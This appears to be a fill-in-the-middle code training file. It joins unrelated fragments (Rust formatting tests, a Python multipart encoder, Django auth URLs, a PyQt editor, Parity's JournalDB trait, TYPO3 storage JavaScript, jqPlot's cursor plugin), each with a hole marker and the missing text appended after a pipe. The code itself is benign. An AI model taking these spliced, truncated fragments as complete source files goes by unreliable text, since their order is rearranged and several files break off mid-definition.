t!(format!("{}", true), "true");
t!(format!("{}", '☃'), "☃");
t!(format!("{}", 10i), "10");
t!(format!("{}", 10i), "10");
t!(format!("{}", 10u), "10");
t!(format!("{:o}", 10u), "12");
t!(format!("{:x}", 10u), "a");
t!(format!("{:X}", 10u), "A");
t!(format!("{}", "foo"), "foo");
t!(format!("{}", "foo".to_string()), "foo");
t!(format!("{:p}", 0x1234 as *const int), "0x1234");
t!(format!("{:p}", 0x1234 as *mut int), "0x1234");
t!(format!("{:x}", A), "aloha");
t!(format!("{:X}", B), "adios");
t!(format!("foo {} ☃☃☃☃☃☃", "bar"), "foo bar ☃☃☃☃☃☃");
t!(format!("{1} {0}", 0i, 1i), "1 0");
t!(format!("{foo} {bar}", foo=0i, bar=1i), "0 1");
t!(format!("{foo} {1} {bar} {0}", 0i, 1i, foo=2i, bar=3i), "2 1 3 0");
t!(format!("{} {0}", "a"), "a a");
t!(format!("{foo_bar}", foo_bar=1i), "1");
t!(format!("{}", 5i + 5i), "10");
t!(format!("{:#4}", C), "☃123");
let a: &fmt::Show = &1i;
t!(format!("{}", a), "1");
// Formatting strings and their arguments
t!(format!("{}", "a"), "a");
t!(format!("{:4}", "a"), "a ");
t!(format!("{:4}", "☃"), "☃ ");
t!(format!("{:>4}", "a"), " a");
t!(format!("{:<4}", "a"), "a ");
t!(format!("{:^5}", "a"), " a ");
t!(format!("{:^5}", "aa"), " aa ");
t!(format!("{:^4}", "a"), " a ");
t!(format!("{:^4}", "aa"), " aa ");
t!(format!("{:.4}", "a"), "a");
t!(format!("{:4.4}", "a"), "a ");
t!(format!("{:4.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:<4.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:>4.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:^4.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:>10.4}", "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:2.4}", "aaaaa"), "aaaa");
t!(format!("{:2.4}", "aaaa"), "aaaa");
t!(format!("{:2.4}", "aaa"), "aaa");
t!(format!("{:2.4}", "aa"), "aa");
t!(format!("{:2.4}", "a"), "a ");
t!(format!("{:0>2}", "a"), "0a");
t!(format!("{:.*}", 4, "aaaaaaaaaaaaaaaaaa"), "aaaa");
t!(format!("{:.1$}", "aaaaaaaaaaaaaaaaaa", 4), "aaaa");
t!(format!("{:.a$}", "aaaaaaaaaaaaaaaaaa", a=4), "aaaa");
t!(format!("{:1$}", "a", 4), "a ");
t!(format!("{1:0$}", 4, "a"), "a ");
t!(format!("{:a$}", "a", a=4), "a ");
t!(format!("{:-#}", "a"), "a");
t!(format!("{:+#}", "a"), "a");
// Some float stuff
t!(format!("{:}", 1.0f32), "1");
t!(format!("{:}", 1.0f64), "1");
t!(format!("{:.3}", 1.0f64), "1.000");
t!(format!("{:10.3}", 1.0f64), " 1.000");
t!(format!("{:+10.3}", 1.0f64), " +1.000");
t!(format!("{:+10.3}", -1.0f64), " -1.000");
t!(format!("{:e}", 1.2345e6f32), "1.2345e6");
t!(format!("{:e}", 1.2345e6f64), "1.2345e6");
t!(format!("{:E}", 1.2345e6f64), "1.2345E6");
t!(format!("{:.3e}", 1.2345e6f64), "1.234e6");
t!(format!("{:10.3e}", 1.2345e6f64), " 1.234e6");
t!(format!("{:+10.3e}", 1.2345e6f64), " +1.234e6");
t!(format!("{:+10.3e}", -1.2345e6f64), " -1.234e6");
// Escaping
t!(format!("{{"), "{");
t!(format!("}}"), "}");
test_write();
test_print();
test_order();
// make sure that format! doesn't move out of local variables
let a = box 3i;
format!("{}", a);
format!("{}", a);
// make sure that format! doesn't cause spurious unused-unsafe warnings when
// it's inside of an outer unsafe block
unsafe {
let a: int = ::std::mem::transmute(3u);
format!("{}", a);
}
test_format_args();
// test that trailing commas are acceptable
format!("{}", "test",);
format!("{foo}", foo="test",);
}
// Basic test to make sure that we can invoke the `write!` macro with an
// io::Writer instance.
fn test_write() {
let mut buf = Vec::new();
write!(&mut buf as &mut io::Writer, "{}", 3i);
{
let w = &mut buf as &mut io::Writer;
write!(w, "{foo}", foo=4i);
write!(w, "{}", "hello");
writeln!(w, "{}", "line");
writeln!(w, "{foo}", foo="bar");
}
let s = String::from_utf8(buf).unwrap();
t!(s, "34helloline\nbar\n");
}
// Just make sure that the macros are defined, there's not really a lot that we
// can do with them just yet (to test the output)
fn test_print() {
print!("hi");
print!("{}", vec!(0u8));
println!("hello");
println!("this is a {}", "test");
println!("{foo}", foo="bar");
}
<|fim▁hole|>fn test_format_args() {
let mut buf = Vec::new();
{
let w = &mut buf as &mut io::Writer;
format_args!(|args| { write!(w, "{}", args); }, "{}", 1i);
format_args!(|args| { write!(w, "{}", args); }, "test");
format_args!(|args| { write!(w, "{}", args); }, "{test}", test=3i);
}
let s = String::from_utf8(buf).unwrap();
t!(s, "1test3");
let s = format_args!(fmt::format, "hello {}", "world");
t!(s, "hello world");
let s = format_args!(|args| {
format!("{}: {}", "args were", args)
}, "hello {}", "world");
t!(s, "args were: hello world");
}
fn test_order() {
// Make sure format!() arguments are always evaluated in a left-to-right
// ordering
fn foo() -> int {
static mut FOO: int = 0;
unsafe {
FOO += 1;
FOO
}
}
assert_eq!(format!("{} {} {a} {b} {} {c}",
foo(), foo(), foo(), a=foo(), b=foo(), c=foo()),
"1 2 4 5 3 6".to_string());
}<|fim▁end|> | // Just make sure that the macros are defined, there's not really a lot that we
// can do with them just yet (to test the output) |
<|file_name|>multipart.py<|end_file_name|><|fim▁begin|>'''
Classes for using multipart form data from Python, which does not (at the
time of writing) support this directly.
To use this, make an instance of Multipart and add parts to it via the factory
methods field and file. When you are done, get the content via the get method.
@author: Stacy Prowell (http://stacyprowell.com)
'''
import mimetypes
class Part(object):
'''
Class holding a single part of the form. You should never need to use
this class directly; instead, use the factory methods in Multipart:
field and file.
'''
# The boundary to use. This is shamelessly taken from the standard.
BOUNDARY = '----------AaB03x'
CRLF = '\r\n'
# Common headers.
CONTENT_TYPE = 'Content-Type'
CONTENT_DISPOSITION = 'Content-Disposition'
# The default content type for parts.
DEFAULT_CONTENT_TYPE = 'application/octet-stream'
def __init__(self, name, filename, body, headers):
'''
Make a new part. The part will have the given headers added initially.
@param name: The part name.
@type name: str
@param filename: If this is a file, the name of the file. Otherwise
None.
@type filename: str
@param body: The body of the part.
@type body: str
@param headers: Additional headers, or overrides, for this part.
You can override Content-Type here.
@type headers: dict
'''
self._headers = headers.copy()
self._name = name
self._filename = filename
self._body = body
# We respect any content type passed in, but otherwise set it here.
# We set the content disposition now, overwriting any prior value.
if self._filename == None:
self._headers[Part.CONTENT_DISPOSITION] = \
('form-data; name="%s"' % self._name)
self._headers.setdefault(Part.CONTENT_TYPE,
Part.DEFAULT_CONTENT_TYPE)
else:
self._headers[Part.CONTENT_DISPOSITION] = \
('form-data; name="%s"; filename="%s"' %
(self._name, self._filename))
self._headers.setdefault(Part.CONTENT_TYPE,
mimetypes.guess_type(filename)[0]
or Part.DEFAULT_CONTENT_TYPE)
return
def get(self):
'''
Convert the part into a list of lines for output. This includes
the boundary lines, part header lines, and the part itself. A
blank line is included between the header and the body.
@return: Lines of this part.
@rtype: list
'''
lines = []
lines.append('--' + Part.BOUNDARY)
for (key, val) in self._headers.items():
lines.append(str('%s: %s' % (key, val)))
lines.append('')
lines.append(self._body)
return lines
class Multipart(object):
'''
Encapsulate multipart form data. To use this, make an instance and then
add parts to it via the two methods (field and file). When done, you can
get the result via the get method.
See http://www.w3.org/TR/html401/interact/forms.html#h-17.13.4.2 for
details on multipart/form-data.
Watch http://bugs.python.org/issue3244 to see if this is fixed in the
Python libraries.
@return: content type, body
@rtype: tuple
'''
def __init__(self):
self.parts = []
return
def field(self, name, value, headers={}):
'''
Create and append a field part. This kind of part has a field name
and value.
@param name: The field name.
@type name: str
@param value: The field value.
@type value: str
@param headers: Headers to set in addition to disposition.
@type headers: dict
'''
self.parts.append(Part(name, None, value, headers))
return
def file(self, name, filename, value, headers={}):
'''<|fim▁hole|>
@param name: The field name.
@type name: str
@param value: The field value.
@type value: str
@param headers: Headers to set in addition to disposition.
@type headers: dict
'''
self.parts.append(Part(name, filename, value, headers))
return
def get(self):
'''
Get the multipart form data. This returns the content type, which
specifies the boundary marker, and also returns the body containing
all parts and bondary markers.
@return: content type, body
@rtype: tuple
'''
all = []
for part in self.parts:
all += part.get()
all.append('--' + Part.BOUNDARY + '--')
all.append('')
# We have to return the content type, since it specifies the boundary.
content_type = 'multipart/form-data; boundary=%s' % Part.BOUNDARY
return content_type, Part.CRLF.join(all)<|fim▁end|> | Create and append a file part. THis kind of part has a field name,
a filename, and a value. |
<|file_name|>urls.py<|end_file_name|><|fim▁begin|># Copyright (C) 2012 Aaron Krebs [email protected]
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
from django.views.generic.simple import direct_to_template
from django.contrib.auth import views as auth_views
from django.conf.urls import patterns, url
from django.core.urlresolvers import reverse_lazy
from registration.views import register
urlpatterns = patterns('',
# urls for simple one-step registration
url(r'^register/$',
register,
{'backend': 'registration.backends.simple.SimpleBackend',
'template_name': 'registration/registration_form.hamlpy',
},
name='registration_register'
),
url(r'^register/closed/$',
direct_to_template,
{'template': 'registration/registration_closed.hamlpy'},<|fim▁hole|> url(r'^login/$',
auth_views.login,
{'template_name': 'registration/login.hamlpy'},
name='auth_login'
),
url(r'^logout/$',
auth_views.logout,
{'template_name': 'registration/logout.hamlpy'},
name='auth_logout'
),
url(r'^password/change/$',
auth_views.password_change,
{'template_name': 'registration/password_change_form.hamlpy',
# ugh, this is tied to the namespace; needs to be namespace-agnostic
# since the namspace is determined by the importing app
# TODO: see Issue #1
'post_change_redirect': reverse_lazy('registration:auth_password_change_done')
},
name='auth_password_change'
),
url(r'^password/change/done/$',
auth_views.password_change_done,
{'template_name': 'registration/password_change_done.hamlpy'},
name='auth_password_change_done'
),
url(r'^password/reset/$',
auth_views.password_reset,
{'template_name': 'registration/password_reset_form.hamlpy',
# same issue as above
'post_reset_redirect': reverse_lazy('registration:auth_password_reset_done'),
'email_template_name': 'registration/password_reset_email.hamlpy',
'subject_template_name': 'registration/password_reset_subject.hamlpy',
},
name='auth_password_reset'
),
url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$',
auth_views.password_reset_confirm,
{'template_name': 'registration/password_reset_confirm.hamlpy',
# same issue as above
'post_reset_redirect': reverse_lazy('registration:auth_password_reset_complete'),
},
name='auth_password_reset_confirm'
),
url(r'^password/reset/complete/$',
auth_views.password_reset_complete,
{'template_name': 'registration/password_reset_complete.hamlpy'},
name='auth_password_reset_complete'
),
url(r'^password/reset/done/$',
auth_views.password_reset_done,
{'template_name': 'registration/password_reset_done.hamlpy'},
name='auth_password_reset_done'
),
)<|fim▁end|> | name='registration_disallowed'
), |
<|file_name|>editorbase.py<|end_file_name|><|fim▁begin|># Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
# PyQt4 includes for python bindings to QT
from PyQt4.QtCore import Qt, QString
from PyQt4.QtGui import QFont, QFontMetrics, QColor, QIcon, QLabel, QWidget, QVBoxLayout
from PyQt4.Qsci import QsciScintilla, QsciLexerPython
<|fim▁hole|>class EditorBase(QsciScintilla):
def __init__(self, mainwindow):
QsciScintilla.__init__(self, mainwindow)
self.mainwindow = mainwindow
## define the font to use
font = QFont()
font.setFamily("Consolas")
font.setFixedPitch(True)
font.setPointSize(10)
# the font metrics here will help
# building the margin width later
fm = QFontMetrics(font)
## set the default font of the editor
## and take the same font for line numbers
self.setFont(font)
self.setMarginsFont(font)
## Line numbers
# conventionnaly, margin 0 is for line numbers
self.setMarginWidth(0, fm.width( "00000" ) + 5)
self.setMarginLineNumbers(0, True)
## Edge Mode shows a red vetical bar at 80 chars
self.setEdgeMode(QsciScintilla.EdgeLine)
self.setEdgeColumn(80)
self.setEdgeColor(QColor("#CCCCCC"))
## Folding visual : we will use boxes
self.setFolding(QsciScintilla.BoxedTreeFoldStyle)
## Braces matching
self.setBraceMatching(QsciScintilla.SloppyBraceMatch)
## Editing line color
#self.setCaretLineVisible(True)
#self.setCaretLineBackgroundColor(QColor("#CDA869"))
## Margins colors
# line numbers margin
self.setMarginsBackgroundColor(QColor("#333333"))
self.setMarginsForegroundColor(QColor("#CCCCCC"))
# folding margin colors (foreground,background)
#self.setFoldMarginColors(QColor("#99CC66"),QColor("#333300"))
self.setFoldMarginColors(QColor("#CCCCCC"),QColor("#CCCCCC"))
## Choose a lexer
lexer = QsciLexerPython()
lexer.setDefaultFont(font)
self.setLexer(lexer)
class EditorTab(object):
def __init__(self, mainwindow, filePath):
self.mainwindow = mainwindow
self.tabIcon = QIcon(":/Images/Images/cog.png")
self.tabLabel = "Editor Dyn Tab"
self.tab = QWidget(self.mainwindow)
self.widgetLayout = QVBoxLayout(self.tab)
self.widgetLayout.setAlignment(Qt.AlignTop)
self.editorStatusLabel = QLabel(self.tab)
self.editorStatusLabel.setAlignment(Qt.AlignCenter)
self.editorStatusLabel.setObjectName("editorStatusLabel")
self.editorStatusLabel.setText(QString("No files currently loaded..."))
self.widgetLayout.addWidget(self.editorStatusLabel)
self.editorStuff = EditorBase(self.mainwindow)
self.widgetLayout.addWidget(self.editorStuff)
try:
f = open(filePath,'r')
except:
return
for l in f.readlines():
self.editorStuff.append(l)
f.close()
self.editorStatusLabel.setText(QString(filePath))
self.mainwindow.tabWidget.insertTab(0,self.tab,self.tabIcon,self.tabLabel)
self.mainwindow.tabWidget.setCurrentIndex(0)<|fim▁end|> | # Main |
<|file_name|>dump_waffle_flags.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
from django.core.management import call_command
from django.core.management.base import BaseCommand
class Command(BaseCommand):
def handle(self, *args, **options):
call_command(
'dumpdata',<|fim▁hole|> use_natural_primary_keys=True,
output='base/fixtures/waffle_flags.json'
)<|fim▁end|> | "waffle.flag",
indent=4,
use_natural_foreign_keys=True, |
<|file_name|>traits.rs<|end_file_name|><|fim▁begin|>// Copyright 2015, 2016 Parity Technologies (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
//! Disk-backed `HashDB` implementation.
use common::*;
use hashdb::*;
use kvdb::{Database, DBTransaction};
/// A `HashDB` which can manage a short-term journal potentially containing many forks of mutually
/// exclusive actions.
pub trait JournalDB: HashDB {
/// Return a copy of ourself, in a box.
fn boxed_clone(&self) -> Box<JournalDB>;
/// Returns heap memory size used<|fim▁hole|> /// This function has a considerable speed requirement --
/// it must be fast enough to call several times per block imported.
fn journal_size(&self) -> usize { 0 }
/// Check if this database has any commits
fn is_empty(&self) -> bool;
/// Get the earliest era in the DB. None if there isn't yet any data in there.
fn earliest_era(&self) -> Option<u64> { None }
/// Get the latest era in the DB. None if there isn't yet any data in there.
fn latest_era(&self) -> Option<u64>;
/// Journal recent database operations as being associated with a given era and id.
// TODO: give the overlay to this function so journaldbs don't manage the overlays themeselves.
fn journal_under(&mut self, batch: &mut DBTransaction, now: u64, id: &H256) -> Result<u32, UtilError>;
/// Mark a given block as canonical, indicating that competing blocks' states may be pruned out.
fn mark_canonical(&mut self, batch: &mut DBTransaction, era: u64, id: &H256) -> Result<u32, UtilError>;
/// Commit all queued insert and delete operations without affecting any journalling -- this requires that all insertions
/// and deletions are indeed canonical and will likely lead to an invalid database if that assumption is violated.
///
/// Any keys or values inserted or deleted must be completely independent of those affected
/// by any previous `commit` operations. Essentially, this means that `inject` can be used
/// either to restore a state to a fresh database, or to insert data which may only be journalled
/// from this point onwards.
fn inject(&mut self, batch: &mut DBTransaction) -> Result<u32, UtilError>;
/// State data query
fn state(&self, _id: &H256) -> Option<Bytes>;
/// Whether this database is pruned.
fn is_pruned(&self) -> bool { true }
/// Get backing database.
fn backing(&self) -> &Arc<Database>;
/// Clear internal strucutres. This should called after changes have been written
/// to the backing strage
fn flush(&self) {}
/// Consolidate all the insertions and deletions in the given memory overlay.
fn consolidate(&mut self, overlay: ::memorydb::MemoryDB);
/// Commit all changes in a single batch
#[cfg(test)]
fn commit_batch(&mut self, now: u64, id: &H256, end: Option<(u64, H256)>) -> Result<u32, UtilError> {
let mut batch = self.backing().transaction();
let mut ops = self.journal_under(&mut batch, now, id)?;
if let Some((end_era, canon_id)) = end {
ops += self.mark_canonical(&mut batch, end_era, &canon_id)?;
}
let result = self.backing().write(batch).map(|_| ops).map_err(Into::into);
self.flush();
result
}
/// Inject all changes in a single batch.
#[cfg(test)]
fn inject_batch(&mut self) -> Result<u32, UtilError> {
let mut batch = self.backing().transaction();
let res = self.inject(&mut batch)?;
self.backing().write(batch).map(|_| res).map_err(Into::into)
}
}<|fim▁end|> | fn mem_used(&self) -> usize;
/// Returns the size of journalled state in memory. |
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup
with open("README.rst") as readme_file:
long_description = readme_file.read()
setup(name="Presser",
version="0.1.8",
packages=["presser",],
license="GNU GPL v3.0",
description="Extracts data from vine, in lieu of an API",
author="Gemma Hentsch",
author_email="[email protected]",
install_requires=[
"beautifulsoup4>=4.3.2",
"requests>=2.4.0",
"PyExecJS>=1.0.4",
],
tests_require=[
"beautifulsoup4",
"requests",
"mock",
"coverage",
"nose",
"PyExecJS",
"responses"
],
long_description=long_description,
test_suite="nose.collector",
url="https://github.com/ladyrassilon/presser",
keywords = ['scraping','vine'],<|fim▁hole|> classifiers=[
"Development Status :: 4 - Beta",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 2.7",
# "Programming Language :: Python :: Implementation",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Programming Language :: Python",
"Intended Audience :: Developers",
]
)<|fim▁end|> | download_url="https://github.com/ladyrassilon/presser/archive/", |
<|file_name|>Storage.js<|end_file_name|><|fim▁begin|>/*
* This file is part of the TYPO3 CMS project.
*
* It is free software; you can redistribute it and/or modify it under
* the terms of the GNU General Public License, either version 2
* of the License, or any later version.
*
* For the full copyright and license information, please read the
* LICENSE.txt file that was distributed with this source code.
*
* The TYPO3 project - inspiring people to share!
*/
/**
* Adds a public API for the browsers' localStorage called
* TYPO3.Storage.Client and the Backend Users "uc",
* available via TYPO3.Storage.Persistent
*/
define('TYPO3/CMS/Backend/Storage', ['jquery'], function ($) {
var Storage = {
Client: {},
Persistent: {
_data: false
}
};
/**
* simple localStorage wrapper, common functions get/set/clear
*/
Storage.Client.get = function(key) {
return localStorage.getItem('t3-' + key);
};
Storage.Client.set = function(key, value) {
return localStorage.setItem('t3-' + key, value);
};
Storage.Client.clear = function() {
localStorage.clear();
};
/**
* checks if a key was set before, useful to not do all the undefined checks all the time
*/
Storage.Client.isset = function(key) {
var value = this.get(key);
return (typeof value !== 'undefined' && typeof value !== 'null' && value != 'undefined');
};
/**
* persistent storage, stores everything on the server
* via AJAX, does a greedy load on read
* common functions get/set/clear
*/
Storage.Persistent.get = function(key) {
if (this._data === false) {
var value;
this._loadFromServer().done(function() {
value = Storage.Persistent._getRecursiveDataByDeepKey(Storage.Persistent._data, key.split('.'));
});
return value;
} else {
return this._getRecursiveDataByDeepKey(this._data, key.split('.'));
}
};
Storage.Persistent.set = function(key, value) {
if (this._data !== false) {
this._data = this._setRecursiveDataByDeepKey(this._data, key.split('.'), value);
}
return this._storeOnServer(key, value);
};
Storage.Persistent.addToList = function(key, value) {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'addToList', key: key, value: value}}).done(function(data) {
Storage.Persistent._data = data;
});
};
Storage.Persistent.removeFromList = function(key, value) {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'removeFromList', key: key, value: value}}).done(function(data) {
Storage.Persistent._data = data;
});
};
Storage.Persistent.unset = function(key) {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'unset', key: key}}).done(function(data) {
Storage.Persistent._data = data;
});
};
Storage.Persistent.clear = function() {
$.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'clear'}});
this._data = false;
};
/**
* checks if a key was set before, useful to not do all the undefined checks all the time
*/
Storage.Persistent.isset = function(key) {
var value = this.get(key);
return (typeof value !== 'undefined' && typeof value !== 'null' && value != 'undefined');
};
/**
* loads the data from outside, only used for the initial call from BackendController
* @param data
*/
Storage.Persistent.load = function(data) {
this._data = data;
};
/**
* loads all data from the server
* @returns jQuery Deferred
* @private
*/
Storage.Persistent._loadFromServer = function() {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'getAll'}, async: false}).done(function(data) {
Storage.Persistent._data = data;
});
};
/**
* stores data on the server, and gets the updated data on return
* to always be up-to-date inside the browser
* @returns jQuery Deferred
* @private
*/
Storage.Persistent._storeOnServer = function(key, value) {
return $.ajax(TYPO3.settings.ajaxUrls['usersettings_process'], {data: {'action': 'set', key: key, value: value}}).done(function(data) {
Storage.Persistent._data = data;
});
};
/**
* helper function used to set a value which could have been a flat object key data["my.foo.bar"] to
* data[my][foo][bar]
* is called recursively by itself
*
* @param data the data to be uased as base
* @param keyParts the keyParts for the subtree
* @param value the value to be set<|fim▁hole|> * @private
*/
Storage.Persistent._setRecursiveDataByDeepKey = function(data, keyParts, value) {
if (keyParts.length === 1) {
data = data || {};
data[keyParts[0]] = value;
} else {
var firstKey = keyParts.shift();
data[firstKey] = this._setRecursiveDataByDeepKey(data[firstKey] || {}, keyParts, value);
}
return data;
};
/**
* helper function used to set a value which could have been a flat object key data["my.foo.bar"] to
* data[my][foo][bar]
* is called recursively by itself
*
* @param data the data to be uased as base
* @param keyParts the keyParts for the subtree
* @returns {*}
* @private
*/
Storage.Persistent._getRecursiveDataByDeepKey = function(data, keyParts) {
if (keyParts.length === 1) {
return (data || {})[keyParts[0]];
} else {
var firstKey = keyParts.shift();
return this._getRecursiveDataByDeepKey(data[firstKey] || {}, keyParts);
}
};
/**
* return the Storage object, and attach it to the global TYPO3 object on the global frame
*/
return function() {
top.TYPO3.Storage = Storage;
return Storage;
}();
});<|fim▁end|> | * @returns the data object |
<|file_name|>jqplot.cursor.js<|end_file_name|><|fim▁begin|>/**
* jqPlot
* Pure JavaScript plotting plugin using jQuery
*
* Version: 1.0.4
* Revision: 1120
*
* Copyright (c) 2009-2012 Chris Leonello
* jqPlot is currently available for use in all personal or commercial projects
* under both the MIT (http://www.opensource.org/licenses/mit-license.php) and GPL
* version 2.0 (http://www.gnu.org/licenses/gpl-2.0.html) licenses. This means that you can
* choose the license that best suits your project and use it accordingly.
*
* Although not required, the author would appreciate an email letting him
* know of any substantial use of jqPlot. You can reach the author at:
* chris at jqplot dot com or see http://www.jqplot.com/info.php .
*
* If you are feeling kind and generous, consider supporting the project by
* making a donation at: http://www.jqplot.com/donate.php .
*
* sprintf functions contained in jqplot.sprintf.js by Ash Searle:
*
* version 2007.04.27
* author Ash Searle
* http://hexmen.com/blog/2007/03/printf-sprintf/
* http://hexmen.com/js/sprintf.js
* The author (Ash Searle) has placed this code in the public domain:
* "This code is unrestricted: you are free to use it however you like."
*
*/
(function($) {
/**
* Class: $.jqplot.Cursor
* Plugin class representing the cursor as displayed on the plot.
*/
$.jqplot.Cursor = function(options) {
// Group: Properties
//
// prop: style
// CSS spec for cursor style
this.style = 'crosshair';
this.previousCursor = 'auto';
// prop: show
// wether to show the cursor or not.
this.show = $.jqplot.config.enablePlugins;
// prop: showTooltip
// show a cursor position tooltip. Location of the tooltip
// will be controlled by followMouse and tooltipLocation.
this.showTooltip = true;
// prop: followMouse
// Tooltip follows the mouse, it is not at a fixed location.
// Tooltip will show on the grid at the location given by
// tooltipLocation, offset from the grid edge by tooltipOffset.
this.followMouse = false;
// prop: tooltipLocation
// Where to position tooltip. If followMouse is true, this is
// relative to the cursor, otherwise, it is relative to the grid.
// One of 'n', 'ne', 'e', 'se', 's', 'sw', 'w', 'nw'
this.tooltipLocation = 'se';
// prop: tooltipOffset
// Pixel offset of tooltip from the grid boudaries or cursor center.
this.tooltipOffset = 6;
// prop: showTooltipGridPosition
// show the grid pixel coordinates of the mouse.
this.showTooltipGridPosition = false;
// prop: showTooltipUnitPosition
// show the unit (data) coordinates of the mouse.
this.showTooltipUnitPosition = true;
// prop: showTooltipDataPosition
// Used with showVerticalLine to show intersecting data points in the tooltip.
this.showTooltipDataPosition = false;
// prop: tooltipFormatString
// sprintf format string for the tooltip.
// Uses Ash Searle's javascript sprintf implementation
// found here: http://hexmen.com/blog/2007/03/printf-sprintf/
// See http://perldoc.perl.org/functions/sprintf.html for reference
// Note, if showTooltipDataPosition is true, the default tooltipFormatString
// will be set to the cursorLegendFormatString, not the default given here.
this.tooltipFormatString = '%.4P, %.4P';
// prop: useAxesFormatters
// Use the x and y axes formatters to format the text in the tooltip.
this.useAxesFormatters = true;
// prop: tooltipAxisGroups
// Show position for the specified axes.
// This is an array like [['xaxis', 'yaxis'], ['xaxis', 'y2axis']]
// Default is to compute automatically for all visible axes.
this.tooltipAxisGroups = [];
// prop: zoom
// Enable plot zooming.
this.zoom = false;
// zoomProxy and zoomTarget properties are not directly set by user.
// They Will be set through call to zoomProxy method.
this.zoomProxy = false;
this.zoomTarget = false;
// prop: looseZoom
// Will expand zoom range to provide more rounded tick values.
// Works only with linear, log and date axes.
this.looseZoom = true;
// prop: clickReset
// Will reset plot zoom if single click on plot without drag.
this.clickReset = false;
// prop: dblClickReset
// Will reset plot zoom if double click on plot without drag.
this.dblClickReset = true;
// prop: showVerticalLine
// draw a vertical line across the plot which follows the cursor.
// When the line is near a data point, a special legend and/or tooltip can
// be updated with the data values.
this.showVerticalLine = false;
// prop: showHorizontalLine
// draw a horizontal line across the plot which follows the cursor.
this.showHorizontalLine = false;
// prop: constrainZoomTo
// 'none', 'x' or 'y'
this.constrainZoomTo = 'none';
// // prop: autoscaleConstraint
// // when a constrained axis is specified, true will
// // auatoscale the adjacent axis.
// this.autoscaleConstraint = true;
this.shapeRenderer = new $.jqplot.ShapeRenderer();
this._zoom = {start:[], end:[], started: false, zooming:false, isZoomed:false, axes:{start:{}, end:{}}, gridpos:{}, datapos:{}};
this._tooltipElem;
this.zoomCanvas;
this.cursorCanvas;
// prop: intersectionThreshold
// pixel distance from data point or marker to consider cursor lines intersecting with point.
// If data point markers are not shown, this should be >= 1 or will often miss point intersections.
this.intersectionThreshold = 2;
// prop: showCursorLegend
// Replace the plot legend with an enhanced legend displaying intersection information.
this.showCursorLegend = false;
// prop: cursorLegendFormatString
// Format string used in the cursor legend. If showTooltipDataPosition is true,
// this will also be the default format string used by tooltipFormatString.
this.cursorLegendFormatString = $.jqplot.Cursor.cursorLegendFormatString;
// whether the cursor is over the grid or not.
this._oldHandlers = {onselectstart: null, ondrag: null, onmousedown: null};
// prop: constrainOutsideZoom
// True to limit actual zoom area to edges of grid, even when zooming
// outside of plot area. That is, can't zoom out by mousing outside plot.
this.constrainOutsideZoom = true;
// prop: showTooltipOutsideZoom
// True will keep updating the tooltip when zooming of the grid.
this.showTooltipOutsideZoom = false;
// true if mouse is over grid, false if not.
this.onGrid = false;
$.extend(true, this, options);
};
$.jqplot.Cursor.cursorLegendFormatString = '%s x:%s, y:%s';
// called with scope of plot
$.jqplot.Cursor.init = function (target, data, opts){
// add a cursor attribute to the plot
var options = opts || {};
this.plugins.cursor = new $.jqplot.Cursor(options.cursor);
var c = this.plugins.cursor;
if (c.show) {
$.jqplot.eventListenerHooks.push(['jqplotMouseEnter', handleMouseEnter]);
$.jqplot.eventListenerHooks.push(['jqplotMouseLeave', handleMouseLeave]);
$.jqplot.eventListenerHooks.push(['jqplotMouseMove', handleMouseMove]);
if (c.showCursorLegend) {
opts.legend = opts.legend || {};
opts.legend.renderer = $.jqplot.CursorLegendRenderer;
opts.legend.formatString = this.plugins.cursor.cursorLegendFormatString;
opts.legend.show = true;
}
if (c.zoom) {
$.jqplot.eventListenerHooks.push(['jqplotMouseDown', handleMouseDown]);
if (c.clickReset) {
$.jqplot.eventListenerHooks.push(['jqplotClick', handleClick]);
}
if (c.dblClickReset) {
$.jqplot.eventListenerHooks.push(['jqplotDblClick', handleDblClick]);
}
}
this.resetZoom = function() {
var axes = this.axes;
if (!c.zoomProxy) {
for (var ax in axes) {
axes[ax].reset();
axes[ax]._ticks = [];
// fake out tick creation algorithm to make sure original auto
// computed format string is used if _overrideFormatString is true
if (c._zoom.axes[ax] !== undefined) {
axes[ax]._autoFormatString = c._zoom.axes[ax].tickFormatString;
}
}
this.redraw();
}
else {
var ctx = this.plugins.cursor.zoomCanvas._ctx;
ctx.clearRect(0,0,ctx.canvas.width, ctx.canvas.height);
ctx = null;
}
this.plugins.cursor._zoom.isZoomed = false;
this.target.trigger('jqplotResetZoom', [this, this.plugins.cursor]);
};
if (c.showTooltipDataPosition) {
c.showTooltipUnitPosition = false;
